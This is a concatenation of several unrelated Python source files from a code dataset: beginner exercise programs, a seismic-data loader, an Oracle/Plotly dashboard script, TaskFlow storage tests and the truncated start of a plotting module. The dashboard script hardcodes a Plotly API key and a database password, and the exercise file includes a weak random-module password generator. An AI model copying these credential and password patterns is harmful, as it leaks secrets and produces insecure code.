elif what == 'list overlap':\r\n import random\r\n x = random.sample(range(5),3)\r\n y = random.sample(range(5),3)\r\n print(x)\r\n print(y)\r\n z = [e for e in x if e in y]\r\n print(z)\r\n\r\n elif what == 'palindrome':\r\n word = input('Type a word or sentence to see if its a palindrome: ')\r\n word = word.replace(' ','')\r\n w = word[::-1]\r\n if w == word:\r\n print('Yes, that\\'s a palindrome.')\r\n elif w != word:\r\n print('No, that\\'s not a palindrome.')\r\n\r\n elif what == 'even numbers':\r\n import random\r\n num = random.sample(range(100),10)\r\n print(num)\r\n num = [i for i in num if i % 2 ==0]\r\n print(num)\r\n\r\n elif what == 'guessing game':\r\n import random\r\n num = random.randint(1,9)\r\n print('Type exit to exit')\r\n guess = input('Guess the number, it is between 1 and 9: ')\r\n if guess == 'exit':\r\n break\r\n guess = int(guess)\r\n while guess != num:\r\n if guess > num:\r\n print('You guessed too high, try again')\r\n elif guess < num:\r\n print('You guessed too low, try again')\r\n guess = int(input('Guess the number, it is between 1 and 9: '))\r\n if guess == num:\r\n print('Wow, fantastic job *slow clapping*')\r\n\r\n elif what == 'prime':\r\n def prime(a,b):\r\n z = []\r\n for i in range(a,b):\r\n x = list(range(2,i+1))\r\n x = [e for e in x if i % e == 0 or e == i]\r\n x = [e for e in x if len(x) == 1]\r\n for e in x:\r\n z.append(e)\r\n print(z)\r\n beg = int(input('Pick the beginning number in your range: '))\r\n end = int(input('Pick the ending number in your range: '))\r\n y = prime(beg,end)\r\n\r\n elif what == 'list end':\r\n import random\r\n x = list(random.sample(range(1,101),5))\r\n x.sort()\r\n print(x)\r\n z = [x[0], x[len(x)-1]]\r\n print(z)\r\n\r\n elif what == 'fibonnaci':\r\n a = [1,1]\r\n b = int(input('How many numbers from the sequence do you want?: '))\r\n def fib():\r\n z = a[len(a)-2] + a[len(a)-1]\r\n a.append(z)\r\n while len(a) < b:\r\n fibonnaci = fib()\r\n print(a)\r\n\r\n elif what == 'list duplicates':\r\n import random\r\n def a():\r\n z = []\r\n while len(z) <= 10:\r\n x = random.randint(1,11)\r\n z.append(x)\r\n print(z)\r\n return z\r\n def b():\r\n return set(a())\r\n print(b())\r\n elif what == 'reverse word order':\r\n def reverse():\r\n x = input('Type a sentence that will be returned in reverse order: ')\r\n x = x.split()\r\n x = x[::-1]\r\n x = ' '.join(x)\r\n return x\r\n print(reverse())\r\n\r\n elif what == 'password':\r\n while True:\r\n a = input('How srong of a password? strong, medium, weak: ')\r\n x = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0'\r\n ,'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\r\n '%','@','#','$','!','^','&','*']\r\n import random\r\n if a == 'strong':\r\n y = random.sample(x,10)\r\n y = ''.join(y)\r\n print(y)\r\n elif a == 'medium':\r\n y = random.sample(x,5)\r\n y = ''.join(y)\r\n print(y)\r\n elif a == 'weak':\r\n y = random.sample(x,3)\r\n y = ''.join(y)\r\n print(y)\r\n elif a == 'end':\r\n break\r\n elif what == 'cow and bull':\r\n import random\r\n list1 = ['1','2','3','4','5','6','7','8','9','0']\r\n x = random.sample(list1,4)\r\n y = list(str(input('Enter a 4-digit number: ')))\r\n guess = 1\r\n def cow():\r\n z = [i for i in x if i in y and y.index(i) == x.index(i)]\r\n return len(z)\r\n def bull():\r\n a = [i for i in x if i in y and y.index(i) != x.index(i)]\r\n return len(a)\r\n if __name__ == '__main__':\r\n while cow() < 4:\r\n print('You have', cow(),'cows and', bull(),'bulls')\r\n y = list(str(input('Enter a 4-digit number: ')))\r\n guess += 1\r\n list2 = ''.join(y)\r\n if list2 == 'end':\r\n print('Ending program')\r\n break\r\n if cow() == 4:\r\n print('Congratulations, you guessed the number!')\r\n print('It only took you', guess,'guesses!')\r\n break\r\n elif what == 'tic':\r\n def wid(x,y):\r\n z = 0\r\n while z < y:\r\n print(str(' ---') * x)\r\n print(str('| ') * (x + 1))\r\n z += 1\r\n def height(y):\r\n x = int(input('Enter the width of the grid: '))\r\n wid(x,y)\r\n print(str(' ---') * x)\r\n\r\n height(int(input('Enter the height of the grid: ')))\r\n\r\n elif what == 'tac':\r\n game = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\n\r\n gameX = [[' ',' ',' '],\r\n [' ',' ',' '],\r\n [' ',' ',' ']]\r\n\r\n def board(x):\r\n print(str(' ---') * 3)\r\n print('|', x[0][0], '|', x[0][1], '|', x[0][2], '|')\r\n print(str(' ---') * 3)\r\n print('|', x[1][0], '|', x[1][1], '|', x[1][2], '|')\r\n print(str(' ---') * 3)\r\n print('|', x[2][0], '|', x[2][1], '|', x[2][2], '|')\r\n print(str(' ---') * 3)\r\n\r\n board(gameX)\r\n\r\n def column(x):\r\n a = [x[0][i] for i in range(0,3) if x[0][i] == x[1][i] and x[0][i] == x[2][i]\\\r\n and x[0][i] != 0]\r\n return a\r\n def row(x):\r\n b = [x[i][0] for i in range(0,3) if x[i][0] == x[i][1] and x[i][0] == x[i][2]\\\r\n and x[i][0] != 0]\r\n return b\r\n def diagonal(x):\r\n c = [x[0][i] for i in [0,2] if x[0][i] == x[1][1] and x[0][i] == x[2][::-1][i]\\\r\n and x[0][i] != 0]\r\n return c\r\n\r\n def win(x):\r\n if 1 in column(game) or 1 in row(game) or 1 in diagonal(game)\\\r\n or 2 in column(game) or 2 in row(game) or 2 in diagonal(game):\r\n return 1\r\n else:\r\n return 2\r\n\r\n moves = 0\r\n\r\n player1 = 0\r\n player2 = 0\r\n\r\n while moves < 9:\r\n if __name__ == '__main__':\r\n while True:\r\n playerX = input('Player 1 enter the coordinate in the form row, column: ')\r\n playerX = playerX.split(',')\r\n\r\n if game[int(playerX[0])-1][int(playerX[1])-1] == 0:\r\n game[int(playerX[0])-1][int(playerX[1])-1] = 1\r\n gameX[int(playerX[0])-1][int(playerX[1])-1] = 'X'\r\n board(gameX)\r\n moves += 1\r\n break\r\n else:\r\n print('That move is already taken')\r\n\r\n if 1 in column(game) or 1 in row(game) or 1 in diagonal(game):\r\n print('Player 1 wins!')\r\n play = input('Do you want to play again?: ')\r\n\r\n if play == 'yes':\r\n moves = 0\r\n player1 += 1\r\n print('Player 1 has', player1, 'wins')\r\n print('Player 2 has', player2, 'wins')\r\n gameX = [[' ',' ',' '],\r\n [' ',' ',' '],\r\n [' ',' ',' ']]\r\n game = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\n continue\r\n\r\n elif play == 'no':\r\n print('Ending')\r\n break\r\n\r\n while True:\r\n playerO = input('Player 2 enter the coordinate in the form row, column: ')\r\n playerO = playerO.split(',')\r\n\r\n if game[int(playerO[0])-1][int(playerO[1])-1] == 0:\r\n game[int(playerO[0])-1][int(playerO[1])-1] = 2\r\n gameX[int(playerO[0])-1][int(playerO[1])-1] = 'O'\r\n board(gameX)\r\n moves += 1\r\n break\r\n else:\r\n print('That move is already taken')\r\n\r\n if 2 in column(game) or 2 in row(game) or 2 in diagonal(game):\r\n print('Player 2 wins!')\r\n play = input('Do you want to play again?: ')\r\n\r\n if play == 'yes':\r\n moves = 0\r\n player2 += 1\r\n print('Player 1 has', player1, 'wins')\r\n print('Player 2 has', player2, 'wins')\r\n gameX = [[' ',' ',' '],\r\n [' ',' ',' '],\r\n [' ',' ',' ']]\r\n game = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\n continue\r\n\r\n elif play == 'no':\r\n print('Ending')\r\n break\r\n\r\n if moves == 9 and win(game) == 2:\r\n print('No one won! Congratulations, you both suck.')\r\n\r\n elif what == 'guess':\r\n a = list(range(1,101))\r\n def end(b):\r\n return b[len(b)-1]\r\n\r\n def beg(b):\r\n return b[0]\r\n\r\n def mid(b):\r\n return b[(len(b)-len(b)//2)-1]\r\n\r\n def guess(b):\r\n global a\r\n print(mid(b))\r\n x = input('Is this your number?: ')\r\n if x == 'high':\r\n a = list(range(beg(b), mid(b) + 1))\r\n elif x == 'low':\r\n a = list(range(mid(b), end(b) + 1))\r\n elif x == 'yes':\r\n print('Yay!')\r\n a = list(range(mid(b), mid(b) -1))\r\n return a\r\n\r\n if __name__ == '__main__':\r\n while len(a) > 2:\r\n guess(a)\r\n if len(a) == 2:\r\n print(mid(a))\r\n z = input('Is this your number?: ')\r\n if z == 'low':\r\n print('Then', a[1],'is your number')\r\n elif z == 'yes':\r\n print('Yay!')\r\n\r\n elif what == 't':\r\n import random\r\n from math import sqrt\r\n n = list(input('Enter a 4-digit number: '))\r\n n = [int(i) for i in n]\r\n z = n\r\n\r\n def group(): # first integer determines grouping side, end or beginning\r\n # second determines how many to group\r\n int = random.randint(1,2)\r\n if int == 1:\r\n int2 = random.randint(2,3)\r\n if int2 == 2:\r\n sqrt = random.randint(1,4)\r\n if sqrt == 1:\r\n proc = process(0, n, sqrt = True)\r\n else:\r\n proc = process(0, n)\r\n elif int2 == 3:\r\n sqrt = random.randint(1,4)\r\n if sqrt == 1:\r\n proc = process(0, n, sqrt = True)\r\n del z[0]\r\n del z[1]\r\n z.insert(0, proc)\r\n\r\n\r\n def divide(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return int(sqr(n[beg]) / n[beg + 1])\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return int(n[beg] / sqr(n[beg + 1]))\r\n\r\n elif (n[beg] / n[beg + 1]) % 1 == 0:\r\n return int(n[beg] / n[beg + 1])\r\n\r\n else:\r\n return 'no'\r\n\r\n def mul(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return int(sqr(n[beg]) * n[beg + 1])\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return int(n[beg] * sqr(n[beg + 1]))\r\n else:\r\n return int(n[beg] * n[beg + 1])\r\n\r\n def add(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return sqr(n[beg]) + n[beg + 1]\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return n[beg] + sqr(n[beg + 1])\r\n else:\r\n return n[beg] + n[beg + 1]\r\n\r\n def sub(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return int(sqr(n[beg]) - n[beg + 1])\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return int(n[beg] + sqr(n[beg + 1]))\r\n\r\n elif n[beg] - n[beg + 1] != 0:\r\n return n[beg] - n[beg + 1]\r\n else:\r\n return 'no'\r\n\r\n def sqr(index, n):\r\n if sqrt(n[index]) % 1 == 0:\r\n return int(sqrt(n[index]))\r\n else:\r\n return 'no'\r\n\r\n def process(loc, n, sqrt = False):\r\n if sqrt == False:\r\n while True:\r\n int = random.randint(1,4)\r\n if int == 1 and divide(loc, n) != 'no':\r\n return divide(loc, n)\r\n break\r\n elif int == 2:\r\n return mul(loc, n)\r\n break\r\n elif int == 3:\r\n return add(loc, n)\r\n break\r\n elif int == 4 and sub(loc, n) != 'no':\r\n return sub(loc, n)\r\n break\r\n \r\n elif sqrt == True:\r\n while True:\r\n int = random.randint(1,4)\r\n if int == 1 and divide(loc, n) != 'no':\r\n return divide(loc, n, sqrt = True)\r\n break\r\n elif int == 2:\r\n return mul(loc, n, sqrt = True)\r\n break\r\n elif int == 3:\r\n return add(loc, n, sqrt = True)\r\n break\r\n elif int == 4 and sub(loc, n) != 'no':\r\n return sub(loc, n, sqrt = True)\r\n break\r\n\r\n elif what == 'end':\r\n print('Ending program')\r\n break\r\n","sub_path":"Python Learning.py","file_name":"Python Learning.py","file_ext":"py","file_size_in_byte":22747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"79302675","text":"import segypy\nimport numpy as np\n# Set verbose level\nsegypy.verbose=1;\n\ndef load_segy(filename, min_inline, max_inline, step_inline, min_xline, max_xline, step_xline):\n # Get only SegyHeader\n SH = segypy.getSegyHeader(filename);\n\n inl=np.arange(min_inline, max_inline, step_inline)\n crl=np.arange(min_xline, max_xline, step_xline)\n\n seis, header, trace_headers = segypy.readSegy(filename)\n\n stack = seis.reshape(header['ns'], inl.size, crl.size)\n return stack","sub_path":"Lukas/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"461574252","text":"\n\nimport plotly\nplotly.tools.set_credentials_file(username='Katya_Kollehina', api_key='tVeOqtxhhASLcb9FSv5B')\n\nimport cx_Oracle\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport re\nimport plotly.dashboard_objs as dashboard\n\ndef fileId_from_url(url):\n \"\"\"Return fileId from a url.\"\"\"\n raw_fileId = re.findall(\"~[A-z]+/[0-9]+\", url)[0][1:]\n print(raw_fileId)\n return raw_fileId.replace('/', ':')\n\n\nconnection = cx_Oracle.connect(\"SYSTEM\", \"florist98\", \"localhost:1521/xe\")\n\ncursor = connection.cursor()\n\n\"\"\" create plot 1 Вивести назву пісні та її тривалість .\"\"\"\n\ncursor.execute(\"\"\"\nSELECT\n song_name,\n song_duration\nFROM SONG\n JOIN Human_wrote_song ON song.song_id = Human_wrote_song.song_id\n\"\"\")\n\nsong_name = []\nsong_duration = []\n\nfor row in cursor:\n print(\"Song_name: \", row[0], \" and its duration: \", row[1])\n song_name.append(row[0])\n song_duration.append(row[1])\n\n\ndata = [go.Bar(\n x=song_name,\n y=song_duration\n)]\n\nlayout = go.Layout(\n title='Song_name and its duration',\n xaxis=dict(\n title='Song_name',\n titlefont=dict(\n family='Courier New, monospace',\n size=18,\n color='#7f7f7f'\n )\n ),\n yaxis=dict(\n title='duration',\n rangemode='nonnegative',\n autorange=True,\n titlefont=dict(\n family='Courier New, monospace',\n size=18,\n color='#7f7f7f'\n )\n )\n)\nfig = go.Figure(data=data, layout=layout)\n\nsong_name_duration = py.plot(fig, filename='song_name_duration')\n\n\"\"\" create plot 2 Вивести ім'я співака, назву пісні та %відношення її тривалості відносно інших.\"\"\"\n\ncursor.execute(\"\"\"\nSELECT\n human_name singer,\n song_name song,\n song_duration duration\nFROM HUMAN\n JOIN Human_wrote_song ON human.human_id = Human_wrote_song.human_id\n JOIN SONG ON song.song_id = Human_wrote_song.song_id\n\"\"\");\n\nsong = []\nduration = []\n\nfor row in cursor:\n print(\"singer \", row[0] + \", song : (\" + row[1], \") and its duration: \", row[2])\n song.append(row[0] + \" \" + row[1])\n duration.append(row[2])\n\npie = go.Pie(labels=song, values=frequency)\nsong_duration = py.plot([pie], filename='song duration relative to others')\n\n\"\"\" create plot 3 Вивести динаміку створення пісень по датах\"\"\"\n\ncursor.execute(\"\"\"\nSELECT\n song_name song,\n song_birth birthday\nFROM SONG\n JOIN HUMAN_WROTE_SONG ON song.song_id = Human_wrote_song.song_id\n\"\"\")\nsong = []\nbirthday = []\n\nfor row in cursor:\n print(\"Song \", row[0], \" Date, when it was written: \", row[1])\n song.append(row[0])\n birthday.append(row[1])\n\nsong_birthday = go.Scatter(\n x=song,\n y=birthday,\n mode='lines+markers'\n)\ndata = [song_birthday]\nsong_birthday = py.plot(data, filename='Song by date, when it was written')\n\n\"\"\"--------CREATE DASHBOARD------------------ \"\"\"\n\nsong_name_duration_id = fileId_from_url(song_name_duration) \nsong_duration_id = fileId_from_url(song_duration)\nsong_birthday_id = fileId_from_url(song_birthday)\n\nbox_1 = {\n 'type': 'box',\n 'boxType': 'plot',\n 'fileId': song_name_duration_id,\n 'title': 'Song_name and its duration'\n}\n\nbox_2 = {\n 'type': 'box',\n 'boxType': 'plot',\n 'fileId': song_duration_id,\n 'title': 'song duration relative to others'\n}\n\nbox_3 = {\n 'type': 'box',\n 'boxType': 'plot',\n 'fileId': song_birthday_id,\n 'title': 'Song by date, when it was written'\n}\nmy_dboard = dashboard.Dashboard()\nmy_dboard.insert(box_1)\nmy_dboard.insert(box_2, 'below', 1)\nmy_dboard.insert(box_3, 'left', 2)\n\npy.dashboard_ops.upload(my_dboard, 'My First Dashboard with Python')\n\n","sub_path":"km51/Kollehina_Kateryna/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240004963","text":"import math \nlayer = iface.activeLayer()\nextent = layer.extent()\n#region_peninsula = '145399.882634,526940.882019,1979440.790516,2391757.031490'\nxmin, xmax,ymin,ymax = extent.xMinimum(), extent.xMaximum(),extent.yMinimum(),2391840\n#extension_peninsula = '145399.0,526999.0,1979440.0,2391840.0'\ndef more_up(v_o):\n v_n = round(v_o)\n if v_n-v_o> 0:\n return v_n\n else:\n return v_n+1\n\nextent_origin={'xmin':xmin,\n 'xmax':xmax,\n 'ymin':ymin,\n 'ymax':ymax}\n\nfor k,v in extent_origin.items():\n print(k,round(v,3))\n \n\ntam_pixel = 100\n\nxmin_n = math.trunc(xmin)\nxmax_tp = more_up(xmax)\ndif_x_tp = xmax_tp-xmin_n\nwhile dif_x_tp%tam_pixel != 0:\n xmax_tp+=1\n dif_x_tp = xmax_tp-xmin_n\nxmax_n=xmax_tp\n\nymin_n =math.trunc(ymin)\nymax_tp = more_up(ymax)\ndif_y = ymax_tp - ymin_n\n\nwhile dif_y % tam_pixel != 0:\n ymax_tp+=1\n dif_y = ymax_tp - ymin_n\nymax_n=ymax_tp\n\nextent_magic={\n 'xmin':xmin_n,\n 'xmax':xmax_n,\n 'ymin':ymin_n,\n 'ymax':ymax_n}\n \n \nfor k,v in extent_magic.items():\n print(k,v)\nregion = \"%f,%f,%f,%f\" % (xmin_n, xmax_n, ymin_n, ymax_n)\nprint ('region',region)\nprint (\"with\",(xmax_n- xmin_n)/tam_pixel)\nprint (\"heith\",(ymax_n- ymin_n)/tam_pixel)\n\n","sub_path":"codigos/secundarios/extent_magic.py","file_name":"extent_magic.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"504890536","text":"# -*- coding: utf-8 -*-\n\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2013 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom taskflow import exceptions\nfrom taskflow import states\nfrom taskflow import storage\nfrom taskflow import test\n\n\nclass StorageTest(test.TestCase):\n\n def test_add_task(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n self.assertEquals(s.get_task_state('42'), states.PENDING)\n\n def test_save_and_get(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n s.save('42', 5)\n self.assertEquals(s.get('42'), 5)\n self.assertEquals(s.fetch_all(), {})\n self.assertEquals(s.get_task_state('42'), states.SUCCESS)\n\n def test_save_and_get_other_state(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n s.save('42', 5, states.FAILURE)\n self.assertEquals(s.get('42'), 5)\n self.assertEquals(s.get_task_state('42'), states.FAILURE)\n\n def test_get_non_existing_var(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n with self.assertRaises(exceptions.NotFound):\n s.get('42')\n\n def test_reset(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n s.save('42', 5)\n s.reset('42')\n self.assertEquals(s.get_task_state('42'), states.PENDING)\n with self.assertRaises(exceptions.NotFound):\n s.get('42')\n\n def test_reset_unknown_task(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n self.assertEquals(s.reset('42'), None)\n\n def test_fetch_by_name(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n name = 'my result'\n s.set_result_mapping('42', {name: None})\n s.save('42', 5)\n self.assertEquals(s.fetch(name), 5)\n self.assertEquals(s.fetch_all(), {name: 5})\n\n def test_fetch_unknown_name(self):\n s = storage.Storage()\n with self.assertRaisesRegexp(exceptions.NotFound,\n \"^Name 'xxx' is not mapped\"):\n s.fetch('xxx')\n\n def test_fetch_result_not_ready(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n name = 'my result'\n s.set_result_mapping('42', {name: None})\n with self.assertRaises(exceptions.NotFound):\n s.get(name)\n self.assertEquals(s.fetch_all(), {})\n\n def test_save_multiple_results(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n s.set_result_mapping('42', {'foo': 0, 'bar': 1, 'whole': None})\n s.save('42', ('spam', 'eggs'))\n self.assertEquals(s.fetch_all(), {\n 'foo': 'spam',\n 'bar': 'eggs',\n 'whole': ('spam', 'eggs')\n })\n\n def test_mapping_none(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n s.set_result_mapping('42', None)\n s.save('42', 5)\n self.assertEquals(s.fetch_all(), {})\n\n def test_inject(self):\n s = storage.Storage()\n s.inject({'foo': 'bar', 'spam': 'eggs'})\n self.assertEquals(s.fetch('spam'), 'eggs')\n self.assertEquals(s.fetch_all(), {\n 'foo': 'bar',\n 'spam': 'eggs',\n })\n\n def test_fetch_meapped_args(self):\n s = storage.Storage()\n s.inject({'foo': 'bar', 'spam': 'eggs'})\n self.assertEquals(s.fetch_mapped_args({'viking': 'spam'}),\n {'viking': 'eggs'})\n\n def test_fetch_not_found_args(self):\n s = storage.Storage()\n s.inject({'foo': 'bar', 'spam': 'eggs'})\n with self.assertRaises(exceptions.NotFound):\n s.fetch_mapped_args({'viking': 'helmet'})\n\n def test_set_and_get_task_state(self):\n s = storage.Storage()\n state = states.PENDING\n s.add_task('42', 'my task')\n s.set_task_state('42', state)\n self.assertEquals(s.get_task_state('42'), state)\n\n def test_get_state_of_unknown_task(self):\n s = storage.Storage()\n with self.assertRaisesRegexp(exceptions.NotFound, '^Unknown'):\n s.get_task_state('42')\n\n def test_task_by_name(self):\n s = storage.Storage()\n s.add_task('42', 'my task')\n self.assertEquals(s.get_uuid_by_name('my task'), '42')\n\n def test_unknown_task_by_name(self):\n s = storage.Storage()\n with self.assertRaisesRegexp(exceptions.NotFound,\n '^Unknown task name:'):\n s.get_uuid_by_name('42')\n\n def test_get_flow_state(self):\n fd = storage.temporary_flow_detail()\n fd.state = states.INTERRUPTED\n fd.save()\n s = storage.Storage(fd)\n self.assertEquals(s.get_flow_state(), states.INTERRUPTED)\n\n def test_set_and_get_flow_state(self):\n s = storage.Storage()\n s.set_flow_state(states.SUCCESS)\n self.assertEquals(s.get_flow_state(), states.SUCCESS)\n","sub_path":"taskflow/tests/unit/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96756983","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUtilities for generating static image and line plots of near-publishable quality\n\nCreated on Thu May 05 13:29:12 2016\n\n@author: Suhas Somnath, Chris R. Smith\n\"\"\"\n# TODO: All general plotting functions should support data with 1, 2, or 3 spatial dimensions.\n\nfrom __future__ import division, print_function, absolute_import, unicode_literals\n\nimport inspect\nimport os\nimport sys\nfrom numbers import Number\nimport numpy as np\nimport h5py\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button\nimport matplotlib.patches as patches\nimport matplotlib.animation as animation\nimport matplotlib.ticker as mtick\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nimport dask.array as da\n\nfrom sidpy.hdf.dtype_utils import is_complex_dtype\nfrom sidpy.base.num_utils import contains_integers, get_exponent\nfrom sidpy.viz.plot_utils import plot_map\n\nif sys.version_info.major == 3:\n unicode = str\n\ndefault_cmap = plt.cm.viridis\n\n\nclass plot_curve(object):\n def __init__(self, dset, ref_dims, figure =None,**kwargs):\n\n fig_args = dict()\n temp = kwargs.pop('figsize', None)\n if temp is not None:\n fig_args['figsize'] = temp\n print(figure)\n if figure == None:\n self.fig = plt.figure(**fig_args)\n else:\n self.fig = figure\n\n self.dset = dset\n self.kwargs = kwargs\n\n # Handle the simple cases first:\n fig_args = dict()\n temp = kwargs.pop('figsize', None)\n if temp is not None:\n fig_args['figsize'] = temp\n\n if len(ref_dims) != 1:\n print( 'data type not handled yet')\n self.axis = self.fig.add_subplot(1, 1, 1, **fig_args)\n\n self._update()\n\n def _update(self):\n\n if False:#is_complex_dtype(np.array(dset)):\n # Plot real and image\n fig, axes = plt.subplots(nrows=2, **fig_args)\n\n for axis, ufunc, comp_name in zip(axes.flat, [np.abs, np.angle], ['Magnitude', 'Phase']):\n axis.plot(self.dset.dims[ref_dims][0], ufunc(np.squeeze(curve)), **kwargs)\n if comp_name == 'Magnitude':\n axis.set_title(self.dset.file.filename.split('/')[-1] + '\\n(' + comp_name + ')', pad=15)\n axis.set_xlabel(self.dset.get_dimension_labels()[ref_dims[0]])# + x_suffix)\n axis.set_ylabel(self.dset.data_descriptor)\n axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n else:\n axis.set_title(comp_name, pad=15)\n axis.set_ylabel('Phase (rad)')\n axis.set_xlabel(self.get_dimension_labels()[ref_dims[0]])# + x_suffix)\n axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n\n fig.tight_layout()\n return fig, axes\n\n else:\n\n self.axis.clear()\n self.axis.plot(self.dset.dims[0][0], self.dset, **self.kwargs)\n self.axis.set_title(self.dset.file.filename.split('/')[-1], pad=15)\n self.axis.set_xlabel(self.dset.get_dimension_labels()[0])# + x_suffix)\n self.axis.set_ylabel(self.dset.data_descriptor)\n self.axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n self.fig.canvas.draw_idle()\n\nclass plot_image(object):\n \"\"\"\n Interactive display of image plot\n\n The stack can be scrolled through with a mouse wheel or the slider\n The ususal zoom effects of matplotlib apply.\n Works on every backend because it only depends on matplotlib.\n\n Important: keep a reference to this class to maintain interactive properties so usage is:\n\n >>view = plot_stack(dataset, {'spatial':[0,1], 'stack':[2]})\n\n Input:\n ------\n - dset: NSI_dataset\n - dim_dict: dictionary\n with key: \"spatial\" list of int: dimension of image\n \"\"\"\n def __init__(self, dset, dim_dict, figure =None,**kwargs):\n\n fig_args = dict()\n temp = kwargs.pop('figsize', None)\n if temp is not None:\n fig_args['figsize'] = temp\n\n if figure == None:\n self.fig = plt.figure(**fig_args)\n else:\n self.fig = figure\n\n self.dset = dset\n extent = self.dset.make_extent(dim_dict['spatial'])\n\n if is_complex_dtype(self.dset):\n # Plot real and image\n fig, axes = plt.subplots(nrows=2, **fig_args)\n for axis, ufunc, comp_name in zip(axes.flat, [np.abs, np.angle], ['Magnitude', 'Phase']):\n cbar_label = self.data_descriptor\n if comp_name == 'Phase':\n cbar_label = 'Phase (rad)'\n plot_map(axis, ufunc(np.squeeze(img)), show_xy_ticks=True, show_cbar=True,\n cbar_label=cbar_label, x_vec=ref_dims[1].values, y_vec=ref_dims[0].values,\n **kwargs)\n axis.set_title(self.name + '\\n(' + comp_name + ')', pad=15)\n axis.set_xlabel(ref_dims[1].name + ' (' + ref_dims[1].units + ')' + suffix[1])\n axis.set_ylabel(ref_dims[0].name + ' (' + ref_dims[0].units + ')' + suffix[0])\n fig.tight_layout()\n return fig, axes\n\n else:\n\n self.axis = self.fig.add_subplot(1,1,1)\n self.img = self.axis.imshow(np.squeeze(self.dset).T, extent=extent, **kwargs)\n self.axis.set_title(self.dset.file.filename.split('/')[-1], pad=15)\n self.axis.set_xlabel(self.dset.get_dimension_labels()[dim_dict['spatial'][0]])# + x_suffix)\n self.axis.set_ylabel(self.dset.get_dimension_labels()[dim_dict['spatial'][1]])\n self.axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n cbar = self.fig.colorbar(self.img)\n cbar.set_label(self.dset.data_descriptor)\n self.fig.tight_layout()\n self.img.axes.figure.canvas.draw_idle()\n\n\nclass plot_stack(object):\n \"\"\"\n Interactive display of image stack plot\n\n The stack can be scrolled through with a mouse wheel or the slider\n The ususal zoom effects of matplotlib apply.\n Works on every backend because it only depends on matplotlib.\n\n Important: keep a reference to this class to maintain interactive properties so usage is:\n\n >>view = plot_stack(dataset, {'spatial':[0,1], 'stack':[2]})\n\n Input:\n ------\n - dset: NSI_dataset\n - dim_dict: dictionary\n with key: \"spatial\" list of int: dimension of image\n with key: \"time\" or \"stack\": list of int: dimension of image stack\n\n \"\"\"\n def __init__(self, dset, dim_dict, figure =None,**kwargs):\n\n fig_args = dict()\n temp = kwargs.pop('figsize', None)\n if temp is not None:\n fig_args['figsize'] = temp\n\n\n if figure == None:\n self.fig = plt.figure(**fig_args)\n else:\n self.fig = figure\n\n\n if len(dset.shape) <3:\n raise KeyError('dataset must have at least three dimensions')\n return\n\n ### We need one stack dimension and two image dimensions as lists in dictionary\n if 'spatial' not in dim_dict:\n raise KeyError('dimension_dictionary must contain a spatial key')\n return\n image_dims = dim_dict['spatial']\n if len(image_dims)<2:\n raise KeyError('spatial key in dimension_dictionary must be list of length 2')\n return\n\n if 'stack' not in dim_dict:\n if 'time' in dim_dict:\n stack_dim = dim_dict['time']\n else:\n raise KeyError('dimension_dictionary must contain key stack or time')\n return\n else:\n stack_dim = dim_dict['stack']\n 